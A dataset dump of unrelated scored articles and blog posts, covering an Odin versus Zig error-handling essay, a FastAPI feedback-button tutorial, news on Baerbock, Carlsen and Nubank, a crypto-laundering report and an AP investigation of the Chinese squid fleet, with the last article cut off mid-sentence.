Dataset columns: labels (float32, 1 – 4.24k), Title (string, lengths 1 – 91), Text (string, lengths 1 – 61.1M)
1
TRTorch: PyTorch/TorchScript Compiler for Nvidia GPUs Using TensorRT
GitHub repository: pytorch/TensorRT
173
Looking into Odin and Zig
I was pointed to the Odin language after my post about the Zig language. On the surface, Odin and Zig are very similar, but they have some fundamental differences in behavior and mindset. I’m basing most of what I’m writing here on an admittedly cursory reading of the Odin language docs and this blog post.

Odin has a great point on conditional compilation. The if statements that are evaluated at compile time are hard to distinguish. I like Odin’s when clauses better, but Zig has comptime if as well, which makes it easier. The actual problem I have with this model in Zig is that it is easy to get into a situation where you write (new) code that doesn’t get called, but Zig will detect that it is unused and not bother compiling it. When you actually try to use it, you’ll hit a lot of compilation errors that you need to fix. This is in contrast to the way I would usually work, which is to almost always have the code in a compilable state and lean hard on the compiler to double-check my work.

Beyond that, I have grave disagreements with Ginger, the author of the blog post and the Odin language. I want to pull just a couple of what I think are the most important points from that post:

I have never had a program cause a system to run out of memory in real software (other than artificial stress tests). If you are working in a low-memory environment, you should be extremely aware of its limitations and plan accordingly. If you are a desktop machine and run out of memory, don’t try to recover from the panic, quit the program or even shut-down the computer. As for other machinery, plan accordingly!

This is in relation to automatic heap allocations (which can fail, and which will usually kill the process because there is no good way to report it). My reaction to that is “640KB is enough for everything”, right?

To start with, I write databases for a living. I run my code on containers with 128MB when the user uses a database that is 100s of GB in size. Even if running on proper server machines, I almost always have to deal with datasets that are bigger than memory. Running out of memory happens to us pretty much every single time we start the program. And handling this scenario robustly is important to building system software. In this case, planning accordingly, in my view, means not using a language that can put me in a hole. This is not theoretical; it is a real scenario that we have to deal with.

The biggest turnoff for me, however, was this statement on errors:

…my issue with exception-based/exception-like errors is not the syntax but how they encourage error propagation. This encouragement promotes a culture of pass the error up the stack for “someone else” to handle the error. I hate this culture and I do not want to encourage it at the language level. Handle errors there and then and don’t pass them up the stack. You make your mess; you clean it.

I didn’t really know how to answer that at first. There are so many cases where that doesn’t even make sense that it isn’t even funny. Consider a scenario where I need to call a service that would compute some value for me. I’m doing that as gRPC over TCP + SSL. Let me count the number of errors that can happen here, shall we? My code, which is calling the service, needs to be able to handle any or all of those, and probably quite a few more that I didn’t account for. Trying to build something like that is onerous, fragile, and doesn’t really work.
For that matter, if I passed the wrong URL for the service, what is the code that is doing the gRPC call supposed to do but bubble the error up? If the DNS is returning an error, or there is a certificate issue, how do you clean that up? The only reasonable thing to do is to give as much context as possible and raise the error to the caller. When building robust software, bubbling the error up so the caller can decide what to do isn’t about passing the buck; it is a best practice. You only need to look at Erlang and how applications with the highest requirements for reliability are structured. They are meant to fail; error handling and recovery happen in dedicated locations (supervisors), because those places have the right context to make an actual determination.

The killer impact of this, however, is that Zig has an explicit notion of errors, while Odin relies on the multiple return values system. We have seen how good that is with Go. In fact, one of the most common complaints about Go is how much manual work it takes to do proper error handling. But I think that the key issue here is that errors as a first-class aspect of the language give us a very powerful ability: errdefer. This single language feature is the reason I think that Zig is an amazing language. The concept of first-class errors combined with errdefer makes building complex structures so much easier.

Note that I’m opening a file, mapping it to memory, validating its size and then checking that it has the right hash. I’m using defer to ensure that I clean up the file handle, but what about the mapped memory? In this case, I want to clean it up if there is an error, but not otherwise. Consider how you would write this code without errdefer: I would have to add the “close the map” portion to both places where I want to return an error. And what happens if I’m using more than a couple of resources? I may need a file, a network socket, memory, etc. Any of those operations can fail, but I want to clean them up only on failure; otherwise, I need to return them to my caller. Using errdefer (which relies on the explicit distinction between regular returns and errors) ensures that I don’t have a problem. Everything works, and the amount of state that I have to keep in my head is greatly reduced. (A rough analogue of this pattern is sketched at the end of this post.) Consider how you would do that in Odin or Go, on the other hand, and you can see how error handling becomes a big beast. Having explicit language support to assist in that is really nice.
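The Zig snippet this post walks through (open, map, validate size and hash, with defer for the handle and errdefer for the mapping) was lost in this copy. As a rough stand-in, here is the same “clean up only on failure, otherwise hand the resource to the caller” pattern sketched in Python; the function name, the min_size check, and the use of mmap are illustrative assumptions, not the original code:

import mmap

def map_and_validate(path: str, min_size: int) -> mmap.mmap:
    # Open a file, map it, validate it; unmap only if validation fails.
    with open(path, "rb") as f:                      # like defer: the handle is always closed
        data = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
        try:
            if data.size() < min_size:               # stand-in for the size/hash checks in the post
                raise ValueError(f"{path} is smaller than {min_size} bytes")
        except BaseException:
            data.close()                             # like errdefer: clean up only on the error path
            raise
    return data                                      # success: the caller now owns the mapping

The point mirrors the argument above: the cleanup for the mapping is written once, right next to the acquisition, and it runs only when a later step fails; on success the mapping is returned intact to the caller.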
15
Annalena Baerbock: The Green Party's candidate to succeed Angela Merkel
When Annalena Baerbock was named the Green Party's first-ever chancellor candidate in April, she was credited with her party's remarkable rise in opinion polls later that month. But then she suffered a barrage of personal attacks, putting her on the defensive, as criticism targeted her personal credibility: Baerbock, who has never held a government office, was accused of minor inaccuracies in her official resume, of a delay in paying taxes on a sizable Christmas bonus, and of plagiarizing parts of her new book, and she also used a racial slur while quoting someone in an interview. Each time, Baerbock was quick to apologize. But her approval ratings declined, and the party's campaign did not manage to regain the positive momentum of earlier in the year.

Baerbock stepped into the limelight when she was elected party co-chair in 2018. The still-little-known regional politician, a resident of the eastern state of Brandenburg, has since projected herself as an expert on how to tackle climate change. In live TV debates with her two competitors for the chancellorship — Armin Laschet, of the center-right Christian Democrats (CDU), and Olaf Scholz, of the center-left Social Democrats (SPD) — Baerbock scored points with younger voters. She attacked the current CDU-SPD coalition government over its dismal record on climate protection. "We are missing our climate targets, with dramatic consequences, and you have both made clear that you didn't orientate yourselves around the solutions, but just pushed the blame on each other about who was hindering what," she said.

Baerbock has been arguing in favor of phasing out coal-powered energy far earlier than the current target date of 2038. She also backs a speed limit of 130 kilometers per hour (78 miles per hour) on the autobahn, as German highways are known, and limiting short-haul flights. She also supports a raise in the minimum wage to €12 ($14) per hour, and she opposes a hike in German defense spending. Baerbock has also spoken out on thorny foreign policy issues, advocating a tough stance on Russia and China over human rights issues. She has also spoken on the threats posed by far-right populism and xenophobia.

The Greens have traditionally failed to gain ground in rural areas and especially in eastern Germany. Baerbock and her family of four have long been based in the eastern city of Potsdam. Early on, Baerbock was driven by ambition. Born in 1980 in the small town of Pattensen in Lower Saxony, she was a natural athlete, placing third at Germany's national trampolining championship. She was only 16 when she went to spend a year in the United States. Later, she studied law in Hannover before going on to the London School of Economics, where she studied international law. As a result, Baerbock gives interviews in fluent English — something that, even in this day and age, can't be taken for granted among German politicians.

In an interview with DW in early 2021, Baerbock welcomed President Joe Biden's decision to bring the US back into the Paris climate agreement. "We Europeans, including the German government, need to take advantage of the current situation to realize the proposals that the US administration has put forward concerning climate-neutral cooperation," she said. "We need to get moving and point the way towards a European and trans-Atlantic Green Deal." Both Baerbock and her co-party chair, Robert Habeck, have few inhibitions about talking to members of other parties to seek possible common ground.
Initially, there was speculation about a possible conservative-Green coalition in Berlin after the 2021 election, but, with the SPD rising in the polls, Baerbock began to stress that a center-left coalition would be her preference. Germany needs a new beginning, Baerbock stressed during her campaign, pointing out that her two competitors were both in their early 60s. "That can only happen with Greens in a leading role," she said, stressing that all democratic parties would have to talk to each other. In doing so, she included the Left Party. She warned strongly against equating the Left with the far-right Alternative for Germany. This is a reworked and updated version of an article that was first published on April 3, 2021.
1
New Technique Predicts Response of Brain Tumors to Chemoradiation – UT News
AUSTIN, Texas — A team studying malignant brain tumors has developed a new technique for predicting how individual patients will respond to chemoradiation, a major step forward in efforts to personalize cancer treatment. Researchers at The University of Texas at Austin’s Oden Institute for Computational Engineering and Sciences, Texas Advanced Computing Center (TACC) and The University of Texas MD Anderson Cancer Center have merged various quantitative imaging measurements with computational simulations to create an accurate model for calculating the progression of high-grade glioma. High-grade gliomas are the most common cancerous primary brain tumors found in adults. Current treatments involve surgical resection of the tumor followed by radiation therapy and chemotherapy. Despite this aggressive treatment, the prognosis for patients who undergo this approach is generally poor. The growth and behavior of these tumors vary from patient to patient, making the need for techniques to personalize therapy at the individual patient level particularly important.

In a paper published in Nature Scientific Reports, the authors used a combination of anatomical and structural imaging to inform a computational mechanistic model that predicts high-grade glioma tumor progression. “This project couldn’t be attempted without close collaboration between engineers and clinicians,” said David Hormuth of the Center for Computational Oncology at UT Austin’s Oden Institute. “Our approach of using individual patient imaging data in a predictive mechanistic model, that incorporates both the anatomical appearance of the tumor on MRI and measurements from a specific MRI scanning technique called diffusion tensor imaging, is showing real promise,” said Dr. Caroline Chung of MD Anderson.

Current radiation therapy methods are already tailored to patients using mostly anatomical imaging data prior to the start of radiation therapy and can be adapted in reaction to major changes in tumor appearance during treatment. However, this new technique is a first step toward providing radiation oncologists with the information they need to personalize treatment plans based on a predicted spatial map of the tumor’s resistance to radiation. Throughout this project, researchers at the Oden Institute and MD Anderson have gone back and forth on the type of data needed, model components and the overall goal or application of this model. The Oden Institute brought the expertise in tumor mechanics and modeling, an innovative, physics-based research approach led by Tom Yankeelov of UT Austin over several years. Once paired with Chung’s quantitative imaging and clinical brain tumor expertise, the researchers successfully translated prior preclinical efforts in high-grade glioma.

TACC, the third partner in the collaboration to end cancer, made it possible for the researchers to simultaneously calibrate a large family of biologically based mathematical models for each patient. “In total, we had roughly 6,000 different calibrations or forecast scenarios that would take years to run on a standard laptop,” Hormuth said. “By using the Lonestar 5 system to run our model calibration and forecasting approach in parallel, we were able to evaluate all of these scenarios in a matter of days.”
2
Norway’s Magnus Carlsen wins FIDE world chess championship
Ian Nepomniachtchi of Russia, left, and Magnus Carlsen of Norway, right, compete during the FIDE World Championship at Dubai Expo 2020 in Dubai, United Arab Emirates, Friday, Dec. 10, 2021. (AP Photo/Jon Gambrell)

DUBAI, United Arab Emirates (AP) — Reigning world chess champion Magnus Carlsen of Norway defended his title and won the FIDE World Championship on Friday in Dubai. He beat Ian Nepomniachtchi of Russia, securing the one point he needed to cross the seven point threshold to win the global tournament held at Dubai’s Expo 2020 this month in the United Arab Emirates. After a surprise blunder by Nepomniachtchi, Carlsen clinched his fifth world championship title. Up until that point, the match was tense with games ending in draw after draw. “Then everything kind of clicked. I think after that it all went my way,” Carlsen told reporters from the world’s fair after his win. “You don’t expect necessarily to run away with it in a world championship.” Carlsen wins 60% of the 2 million-euro prize offered by the championship. Nepomniachtchi said he was struggling to understand exactly what went wrong and at the moment had “no idea.” “The things that happened to me here never happened to me basically at any events ... in my career I lost quite some stupid games,” Nepomniachtchi said grimly. “I should find out why it happened.”
2
Creating a feedback button with FastAPI and hyperscript
Feedback is one of the most important things when you are creating a product (probably the most important one!), so it should be easy for users to give feedback. In this post we’ll see how to implement a feedback button easily. This exact code is what I’m using at drwn.io, a little project I’m working on with a friend. The button does the following: after you use it, it will change its text to “Thank you!”, then it will fade out, and we will have our backend handle the message. Let’s see it in action:

The first thing we need is an HTML button, styled using Tailwind CSS. Notice the _="on click ...", this is where we will put our hyperscript code. To use hyperscript, add this to your page’s <head>. (Right now I’m using version 0.0.3, make sure to update it if you are reading this in the future. The package path below is reconstructed; the version in the original URL was obscured in this copy.)

<script src="https://unpkg.com/hyperscript.org@0.0.3"></script>

And now our HTML button with hyperscript (the id and class attribute names and the button label were garbled in this copy and are reconstructed from the surrounding description):

<div id="get-feedback-div" class="inline-flex ml-3 transition-opacity duration-500 ease-in rounded-md shadow">
  <button id="get-feedback-button"
          _="on click call getFeedback() then set #get-feedback-button.innerText to 'Thank you!' then wait 1000ms then toggle .opacity-0 on #get-feedback-div then wait 600ms then toggle .hidden on #get-feedback-div"
          class="inline-flex items-center justify-center px-5 py-3 text-base font-medium text-blue-600 bg-white border border-transparent rounded-md hover:bg-blue-50">
    Feedback
  </button>
</div>

We can go step-by-step with hyperscript:

on click call getFeedback(): when the button is clicked, execute the function getFeedback() (explained later).
then set #get-feedback-button.innerText to 'Thank you!': after that, get the element with id get-feedback-button and change the innerText to 'Thank you!'
then wait 1000ms: self-explanatory I guess
then toggle .opacity-0 on #get-feedback-div: toggle the CSS class opacity-0 on the element with id get-feedback-div
then wait 600ms then toggle .hidden on #get-feedback-div: finally, wait again and toggle the class hidden on the element

What I love about hyperscript is: the code is all in one place, I don’t have to go back and forth between JavaScript and HTML files, and it feels like I’m writing in a declarative language. I tell it what I want, and it does it.

Now our getFeedback() function. It’s straightforward: use prompt() to get a message and, if the user writes something, send a JSON request to the /feedback_prompt endpoint. (The code was garbled in this copy; the fetch-based reconstruction below follows the description.)

function getFeedback() {
  const message = prompt("Write your message here:", "");
  if (message != "") {
    const data = { msg: message };
    fetch("/feedback_prompt", {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify(data),
    })
      .then()
      .catch((error) => {
        alert("There was an error sending your message, please try it later.");
      });
  }
}

And now our backend with FastAPI to wrap everything up. We have an endpoint that reads the message and passes it to a notify() function. This function can be whatever you want; in my projects it’s usually sending the message to Telegram, Slack and/or email. (This block was also garbled; the notify() body shown here is a placeholder.)

from pydantic import BaseModel
from fastapi import FastAPI

app = FastAPI()


def notify(message: str):
    print(message)  # placeholder: send to Telegram, Slack and/or email


class FeedBackPrompData(BaseModel):
    msg: str


@app.post("/feedback_prompt")
def feedback_post(data: FeedBackPrompData):
    content = f"Feedback from drwn.io: \n\n{data.msg}"
    notify(content)
    return

And that’s it, we now have a working full-stack system with a feedback button.
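As a quick sanity check of the endpoint, FastAPI’s bundled TestClient can exercise it directly without running a server. This snippet is an illustrative addition (not part of the original post) and assumes the app and FeedBackPrompData definitions from the backend code above:

from fastapi.testclient import TestClient

client = TestClient(app)  # "app" is the FastAPI instance defined in the backend snippet above

response = client.post("/feedback_prompt", json={"msg": "Great product!"})
assert response.status_code == 200  # notify() was called with the formatted message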
4
Berkshire leads $750M Nubank funding round, values it at $30B
June 8 (Reuters) - Warren Buffett's Berkshire Hathaway Inc (BRKa.N) invested $500 million in Brazil's Nubank, giving the fast-growing fintech a big vote of confidence as it seeks to widen its footprint across Latin America. Nubank, best known as a credit card issuer, also said it raised an additional $250 million from a series of other investors. The new investments give Nubank a $30 billion valuation, up from $25 billion at the time of its previous fundraising round, according to a source familiar with the situation. That would make the upstart bank worth just slightly less than Banco Santander Brasil SA (SANB3.SA), Brazil's No. 3 bank, which has more than 2,000 branches. The transaction also vaults Nubank into the upper echelons of fintechs worldwide, on a par with brokerage startup Robinhood Markets Inc and China's Lufax but still far behind Ant Group. Nubank, which has 40 million clients, said in a statement it plans to use the proceeds to fund its international expansion to Mexico and Colombia, launch new products and services and hire more employees.

The arrival of such high-profile investors, who usually invest in publicly traded companies, hints at how close Nubank is to a listing. Earlier in April, Reuters reported that Nubank had initiated preparations for a U.S. stock market listing which could come as early as this year, according to sources familiar with the matter. Nubank is Warren Buffett's second bet on a Brazilian financial startup. His Berkshire Hathaway also acquired a stake in payments company StoneCo Ltd (STNE.O) almost three years ago, when it went public. With a highly concentrated financial market, in which the top five lenders hold almost 78% of the country's total assets, Brazil has been a hotbed for fintech growth. Online banking has reduced costs for newcomers and the central bank has created new rules to encourage competition, aiming at lower fees and interest rates for consumers.

Nubank's $750 million new funding round is part of its series G fundraising round, which totaled $1.15 billion. An initial part of the series G round was announced in January. Other participants in the round included Sands Capital, Canada Pension Plan Investment Board, MSA Capital, Advent's Sunley House Capital and Brazilian asset managers Verde Asset Management and Absoluto Partners. Reporting by Noor Zainab Hussain in Bengaluru; Editing by Maju Samuel
1
️ AI created natural sounding voices for your YouTube videos ⭐️⭐️⭐️⭐️⭐️
Advanced video and audio (text-to-speech) editor: Manage your voice over videos or audio files in projects. Edit your videos in our modern voice over editor. Our video editor also allows time stretching. Customize speech with pitch and speech speed controls to allow faster or slower speech. Add sound or an accent to a selected word. You can even let the voice whisper or breathe.
Natural sounding voice: We convert text to natural sounding speech. Using a powerful neural network, we produce first-class audio data. We support Speech Synthesis Markup Language (SSML). Check out our SSML-Editor tutorial.
Easy to use in your browser: Select your video (without upload) and enter your text directly below the video, and a voice will be automatically generated.
Automatic translation: Automatically convert your voice over or text-to-speech into multiple languages. The automatic translation makes this possible with just one click.
Convert Text to Speech to MP3: You can save all text-to-speech you have created to MP3, WAV, or MP4 (video). Batch processing with text to speech is also possible; import e.g. your ebooks and convert them to speech.
Add Background Music: Add background music to your video or audio files using SSML tags.
Create ready-to-use YouTube Videos: Create voice-overs for your YouTube videos. Explainer videos, tutorials, screencasts and more. And save your video directly as MP4.
Video and audio transcription: Transcribe your audio and translate it automatically. Dub and translate your video automatically with transcription and text to speech.
Screen Recorder: You have the possibility to record a video (e.g. a screencast) directly with your browser and create a voice over for it.
2
270 Addresses are responsible for 55% of all cryptocurrency money laundering
Most cryptocurrency money laundering is concentrated in a few online services, opening the door for law enforcement actions. Image: Chainalysis

Criminals who keep their funds in cryptocurrency tend to launder funds through a small cluster of online services, blockchain investigations firm Chainalysis said in a report last week. This includes services like high-risk (low-reputation) crypto-exchange portals, online gambling platforms, cryptocurrency mixing services, and financial services that support cryptocurrency operations headquartered in high-risk jurisdictions. Criminal activity studied in this report included cryptocurrency addresses linked to online scams, ransomware attacks, terrorist funding, hacks, transactions linked to child abuse materials, and funds linked to payments made to dark web marketplaces offering illegal services like drugs, weapons, and stolen data. But while you'd expect the money laundering resulting from such a broad spectrum of illegal activity to have taken place across a large number of services, Chainalysis reports that just a small group of 270 blockchain addresses have laundered around 55% of cryptocurrency associated with criminal activity. Expanding this group further, Chainalysis says that 1,867 addresses received 75% of all criminally-linked cryptocurrency funds in 2020, a sum estimated at around $1.7 billion. Image: Chainalysis

"This level of concentration is greater than in 2019," Chainalysis researchers said in the report. "In particular, we see a much greater share of illicit cryptocurrency going to addresses taking in between $1 million and $100 million worth of cryptocurrency per year." "We believe the growing concentration of deposit addresses receiving illicit cryptocurrency reflects cybercriminals' increasing reliance on a small group of OTC (over-the-counter) brokers and other nested services specializing in money laundering." Compared to three years ago, when criminal groups used a wider array of services, Chainalysis says this bottleneck in money laundering operations is good news. The company believes that the cryptocurrency-related money laundering field is now in a vulnerable position where a few well-orchestrated law enforcement actions against a few cryptocurrency operators could cripple the movement of illicit funds of many criminal groups at the same time. Furthermore, additional analysis also revealed that many of the services that play a crucial role in money laundering operations are second-tier services hosted at larger legitimate operators. In this case, a law enforcement action wouldn't even be necessary, as convincing a larger company to enforce its anti-money-laundering policies would lead to the shutdown of many of today's cryptocurrency money laundering hotspots.
5
Great Wall of Lights: China's sea power on Darwin's doorstep
By Joshua Goodman (@APJoshGoodman, jgoodman@ap.org)

ABOARD THE OCEAN WARRIOR in the eastern Pacific Ocean (AP) — It’s 3 a.m., and after five days plying through the high seas, the Ocean Warrior is surrounded by an atoll of blazing lights that overtakes the nighttime sky. “Welcome to the party!” says third officer Filippo Marini as the spectacle floods the ship’s bridge and interrupts his overnight watch. It’s the conservationists’ first glimpse of the world’s largest fishing fleet: an armada of nearly 300 Chinese vessels that have sailed halfway across the globe to lure the elusive Humboldt squid from the Pacific Ocean’s inky depths. As Italian hip hop blares across the bridge, Marini furiously scribbles the electronic IDs of 37 fishing vessels that pop up as green triangles on the Ocean Warrior’s radar onto a sheet of paper, before they disappear. Immediately he detects a number of red flags: two of the boats have gone ‘dark,’ their mandatory tracking device that gives a ship’s position switched off. Still others are broadcasting two different radio numbers — a sign of possible tampering.

The Associated Press with Spanish-language broadcaster Univision accompanied the Ocean Warrior this summer on an 18-day voyage to observe up close for the first time the Chinese distant water fishing fleet on the high seas off South America. The vigilante patrol was prompted by an international outcry last summer when hundreds of Chinese vessels were discovered fishing for squid near the long-isolated Galapagos Islands, a UNESCO world heritage site that inspired 19th-century naturalist Charles Darwin and is home to some of the world’s most endangered species, from giant tortoises to hammerhead sharks.

China’s deployment to this remote expanse is no accident. Decades of overfishing have pushed its overseas fleet, the world’s largest, ever farther from home. Officially capped at 3,000 vessels, the fleet might actually consist of thousands more. Keeping such a sizable flotilla at sea, sometimes for years at a time, is at once a technical feat made possible through billions in state subsidies and a source of national pride akin to what the U.S. space program was for generations of Americans. Beijing says it has zero tolerance for illegal fishing and points to recent actions such as a temporary moratorium on high seas squid fishing as evidence of its environmental stewardship. Those now criticizing China, including the U.S. and Europe, for decades raided the oceans themselves. But the sheer size of the Chinese fleet and its recent arrival to the Americas has stirred fears that it could exhaust marine stocks. There’s also concern that in the absence of effective controls, illegal fishing will soar. The U.S. Coast Guard recently declared that illegal fishing had replaced piracy as its top maritime security threat. Meanwhile, activists are seeking restrictions on fishing as part of negotiations underway on a first-ever High Seas Treaty, which could dramatically boost international cooperation on the traditionally lawless waters that comprise nearly half of the planet.

Of the 30 vessels the AP observed up close, 24 had a history of labor abuse accusations, past convictions for illegal fishing or showed signs of possibly violating maritime law. Collectively, these issues underscore how the open ocean around the Americas — where the U.S. has long dominated and China is jockeying for influence — has become a magnet for the seafood industry’s worst offenders.
Specifically, 16 ships either sailed with their mandatory safety transponders turned off, broadcast multiple electronic IDs or transmitted information that didn’t match its listed name or location — discrepancies that are often associated with illegal fishing, although the AP saw no evidence that they were engaged in illicit activity. Six ships were owned by companies accused of forced labor including one vessel, the Chang Tai 802, whose Indonesian crew said they had been stuck at sea for years. Another nine ships face accusations of illegal fishing elsewhere in the world while one giant fuel tanker servicing the fleet, the Ocean Ruby, is operated by the affiliate of a company suspected of selling fuel to North Korea in violation of United Nations sanctions. Yet another, the Fu Yuan Yu 7880, is operated by an affiliate of a Nasdaq-traded company, Pingtan Marine Enterprise, whose Chinese executives had their U.S. visas cancelled for alleged links to human trafficking. “Beijing is exporting its overfishing problem to South America,” said Captain Peter Hammarstedt, director of campaigns for Sea Shepherd, a Netherlands-based ocean conservation group that operates nine well-equipped vessels, including the Ocean Warrior. “China is chiefly responsible for the plunder of shark and tuna in Asia,” says Hammarstedt, who organized the high seas campaign, called Operation Distant Water, after watching how illegal Chinese vessels ravaged poor fishing villages in West Africa. “With that track record, are we really supposed to believe they will manage this new fishery responsibly?” The roar of the mechanical jiggers pulling the catch from the ocean’s depths can be heard hundreds of feet away before you come upon the floating slaughterhouse. The stench too, as the highly aggressive squid blow their ink sacs in one final, futile effort to avoid their inexorable fate. By all accounts, the Humboldt squid — named for the nutrient-rich current found off the southwest coast of South America — is one of the most abundant marine species. Some scientists believe their numbers may even be thriving as the oceans warm and their natural predators, sharks, and tuna, are fished out of existence. But biologists say they’ve never faced a threat like the explosion of industrial Chinese fishing off South America. The number of Chinese-flagged vessels in the south Pacific has surged 10-fold from 54 active vessels in 2009 to 557 in 2020, according to the South Pacific Regional Fisheries Management Organization , or SPRFMO, an inter-governmental group of 15 members charged with ensuring the conservation and sustainable fishing of the species. Meanwhile, the size of its catch has grown from 70,000 tons in 2009 to 358,000. Fishing takes place almost exclusively at night when each ship turns on hundreds of lights as powerful as anything at a stadium to attract swarms of the fast-flying squid. The concentration of lights is so intense it can be seen from space on satellite images that show the massive fleet shining as brightly as major cities hundreds of miles away on land. The Chinese squid fishing fleet at night as seen from space. (Images by NASA) “It really is like the Wild West,” said Hammarstedt. “Nobody is responsible for enforcement out there.” Experts warn that even a naturally bountiful species like squid is vulnerable to overfishing. Although it’s unknown how many Humboldt squid remain, they point to past disappearance of squid stocks in Argentina, Mexico, and Japan as cause for concern. 
“If you have a vast resource and it’s easy to take, then it’s easy to fall into the trap of thinking that this is limitless, that it’s just stars in the sky,” said William Gilly, a Stanford University marine biologist. “If humanity puts its mind to it, there’s no limit to the damage we can do.” Gilly said squid are also a key barometer of marine environments — a biological conveyor belt transporting energy from tiny carbon-absorbing plankton to longer-living predators, like sharks and tuna, and ultimately, human beings. A Chinese-flagged jigger uses powerful nighttime lights to fish for Humboldt squid on the high seas near the Galapagos Islands. “The people who fish squid are happy,” said Daniel Pauly, a prominent marine biologist who in the 1990s coined the phrase “fishing down the food web” to describe how previously spurned chum were replacing bigger fish on dinner plates. “But this is part of the gradual degradation of the ocean.” For dozens of Chinese ships, the journey to the warm equatorial waters near the Galapagos began months earlier, on the opposite side of South America, where every Austral summer, between November and March, hundreds of foreign-flagged jiggers scoop up untold amounts of shortfin squid in one of the world’s largest unregulated fishing grounds. The plunderer’s paradise lies between Argentina’s maritime border and the British-held Falkland Islands in a Jamaica-sized no man’s land where fishing licenses, catch limits and oversight are non-existent. Between November 2020 and May 2021, a total of 523 mostly Chinese fishing vessels — 35% more than the previous season — were detected just beyond the boundary of Argentina’s 200-nautical mile exclusive economic zone, according to satellite data analyzed by Windward, a maritime intelligence firm. Of that amount, 42% had turned off at least once their safety transponders. Meanwhile, 188 of those same vessels showed up near the Galapagos, including 14 Chinese vessels that went offline in both oceans for an average 34 hours each time. Feb. 22, 2018 incident in which the Argentine Coast Guard chased a Chinese fishing boat that had moved within Argentina's exclusive economic zone. It’s impossible to know what the ships did while they were ‘dark.’ However, sometimes ships turn off their tracking systems to avoid detection while carrying out illicit activities. Argentine authorities over the years have spotted numerous Chinese vessels off the grid fishing illegally in its waters, once even firing shots into and sinking a trawler that tried to ram its pursuer near a whale breeding ground. Under a United Nations maritime treaty, to which China is a signatory, large ships are required to continuously use what’s known as an automated identification system, or AIS, to avoid collisions. Switching it off, except in cases of an imminent threat, for example hiding from pirates, is a major breach that should lead to sanctions for a vessel and its owner under the law of the nation to which it is flagged. But China until now appears to have done little to rein in its distant water fleet. The Chinese fleet is able to fish for sometimes years at a time because they can offload their catch at sea into a network of giant refrigerated vessels, or reefers, capable of hauling more than 15,000 cubic meters of fish — enough to fill six Olympic-sized pools — to port. Giant tankers provide cheap fuel heavily subsidized by the Chinese government, adding to the environmental burden. 
The 12 reefers active in the Pacific this past July as the Ocean Warrior was patrolling nearby had at least 196 encounters with fishing vessels during that period, according to satellite data analyzed by Global Fishing Watch, a group that supports sustainable fishing. Nearly 11% of total U.S. seafood imports in 2019 worth $2.4 billion came from illegal, unreported and unregulated fishing, according to the U.S. International Trade Commission, a federal agency. Outside the U.S., the problem is believed to be even worse. “We don’t know if things are getting better or worse,” said Boris Worm, a marine biologist at Dalhousie University in Halifax, Canada. “It basically comes down to who you believe.” In the seascape of the world’s oceans, Pingtan Marine and its affiliates have left in their wake accusations of illegal fishing by authorities in places as diverse as South Africa, Timor Leste, Ecuador, and Indonesia. But the company is not some rogue outfit. It boasts China’s second-largest overseas fleet , trades shares on the U.S. Nasdaq, and in its home port of Fuzhou, across from Taiwan, is helping build one of the world’s largest fish factories. The company’s Chairman and CEO, Zhou Xinrong, appears to have built the fishing empire through massive state loans, generous subsidies, and Communist Party connections. “It’s not just a fishing company — it’s practically a Chinese government asset,” said Susi Pudjiastuti, who as Indonesia’s former fishing minister between 2014 and 2019 was lionized by conservationists for destroying hundreds of illegal foreign fishing vessels. Fifty-seven of Pingtan’s ships, including three refrigerated carrier vessels, all of them owned directly or through an affiliate, were registered by China in the past few years to fish in the south Pacific, according to C4ADS, a Washington-based think tank that last year authored a report on illegal fishing . Pingtan in its last earnings report almost a year ago said that it had $280 million in outstanding loans from the China Development Bank and other state lenders. One of the country’s biggest state investment funds owns an 8% stake in one of its subsidiaries. Meanwhile, Chinese state subsidies to Pingtan for the building of vessels totaled $29 million in the first nine months of last year — about a third of all its purchases of property and equipment. As part of Pudjiastuti’s crackdown, vessels operated by two Pingtan affiliates in Indonesia had their licenses revoked for a slew of alleged offenses ranging from falsifying catch reports, illegal transshipments, and the smuggling of endangered species. Those affiliates, PT Avona Mina Lestari and PT Dwikarya Reksa Abad, are managed or partly owned by members of Zhou’s immediate family, Pingtan disclosed in filings with the U.S. Securities and Exchange Commission. Crew members of one vessel told authorities they had been “gang-beaten,” hit on their heads with a piece of steel and subjected to “torture” by their Chinese supervisors, according to an Indonesian court ruling upholding the ban on the Pingtan affiliate. A Panama-flagged carrier vessel, the Hai Fa, whose listed owner is a different Pingtan affiliate based in Hong Kong, was seized in 2014 with 900 tons of illegally caught fish, including endangered shark species. A lenient court later released the vessel from custody after it paid a $15,000 fine. 
An entity majority-owned by Zhou’s wife also operates the Fu Yuan Yu Leng 999, which was caught in 2017 transiting through the Galapagos Marine Reserve with more than 6,000 dead sharks on board. Another Pingtan-affiliated vessel spotted by AP, the Fu Yuan Yu 7880, was arrested by South Africa in 2016 after it tried to flee a naval patrol that suspected it of illegal squid fishing. The ship’s officers were found guilty of possessing illegal gear and disobeying a maritime authority but were released after paying a fine. “The more you learn about these vessels and equipment, the harder it is to sleep at night,” said Pudjiastuti. “These South Americans should wake up as early as possible.” Pingtan didn’t answer a detailed list of questions. “Pingtan doesn’t answer questions raised by the media,” the company said in an e-mail. As scandal has followed Pingtan and its affiliates around the world, investors have dumped the company’s stock. In June, Nasdaq sent notice that it would delist the company unless its share price, which has tumbled nearly 80% the last two years, crawls back above a minimum $1 threshold soon. The threat of delisting followed the abrupt resignation of the company’s independent auditor, which warned about Pingtan’s ability to continue doing business. Pingtan told the SEC that its failure to file any quarterly reports for nearly a year was due to a “material weakness” in its ability to conform with U.S. accounting practices. One decision that Pingtan has also not commented on is the surprise U.S. sanction of its top executives. Two U.S. officials said that CEO Zhou Xinrong and his wife were among the 15 individuals who had their visas cancelled last year for being “complicit” in illegal fishing and human trafficking . The decision, taken in the waning days of the Trump administration, was the first of its kind specifically targeting abuse in the fishing industry, the two officials said on the condition of anonymity to discuss internal deliberations. Criticism of China’s distant water fishing fleet has spurred some reform. Last year, China imposed stricter penalties on companies caught breaking the rules, including manipulating their transceivers. They’ve also boosted reporting requirements for transshipments on the high seas, banned blacklisted vessels from entering Chinese ports and ordered off-season moratoriums on squid fishing in the high seas near Argentina and Ecuador. Video produced and edited by Peter Hamlin The measures, while far from a panacea, nonetheless mark a giant leap for the world’s largest consumer and producer of fish products. “I used to go to conference and officials would be in just complete denial,” said Tabitha Mallory, a China scholar at the University of Washington who specializes in the country’s fishing policies. “At least now, they’re acknowledging that their fishing is unsustainable, even if it’s just to counter all the 